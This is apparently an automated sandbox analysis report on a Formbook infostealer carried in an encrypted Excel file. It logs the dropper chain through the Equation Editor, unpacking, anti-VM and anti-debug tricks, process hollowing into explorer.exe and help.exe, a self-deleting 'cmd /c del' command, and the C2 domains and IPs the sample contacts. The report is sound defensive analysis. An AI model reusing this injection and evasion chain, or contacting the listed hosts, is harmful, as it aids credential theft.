          Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/28@12/9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Bank Details.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREA8D.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Bank Details.xlsxStatic file information: File size 2370560 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
          Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2218410009.0000000000579000.00000004.00000020.sdmp
          Source: Bank Details.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Bank Details.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00416090 push edi; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00407101 push cs; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00416104 push ds; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CA5A pushfd ; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004162ED push es; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B41B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415EC4 push edx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415FA8 push esp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095DFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00416090 push edi; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00407101 push cs; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00416104 push ds; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004162ED push es; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B41B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CA5A pushfd ; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00415EC4 push edx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00415FA8 push esp; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B3DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00096090 push edi; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00087101 push cs; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00096104 push ds; retf
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000962ED push es; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009B41B push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009B412 push eax; ret
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Bank Details.xlsxStream path 'EncryptedPackage' entropy: 7.99971479672 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2884Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 260Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000002.2373354532.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2191497413.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2191450575.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01dRom0
          Source: explorer.exe, 00000006.00000000.2191450575.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01
          Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2184668586.00000000004D4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000006.00000002.2373391560.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72341000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_02E21667 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_02E2187F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00940080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009400EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.thunderoffroadresort.com
          Source: C:\Windows\explorer.exeDomain query: www.18598853855.com
          Source: C:\Windows\explorer.exeDomain query: www.stone-master.info
          Source: C:\Windows\explorer.exeNetwork Connect: 144.76.242.196 80
          Source: C:\Windows\explorer.exeDomain query: www.qcmax.com
          Source: C:\Windows\explorer.exeDomain query: www.thesixteenthround.net
          Source: C:\Windows\explorer.exeDomain query: www.christlicheliebe.net
          Source: C:\Windows\explorer.exeNetwork Connect: 104.128.125.95 80
          Source: C:\Windows\explorer.exeNetwork Connect: 18.166.77.19 80
          Source: C:\Windows\explorer.exeDomain query: www.hostvngiare.com
          Source: C:\Windows\explorer.exeDomain query: www.starr2021.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.playfulpainters.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.230.51.235 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.71.76 80
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72341000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: B00000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2373354532.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery231Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
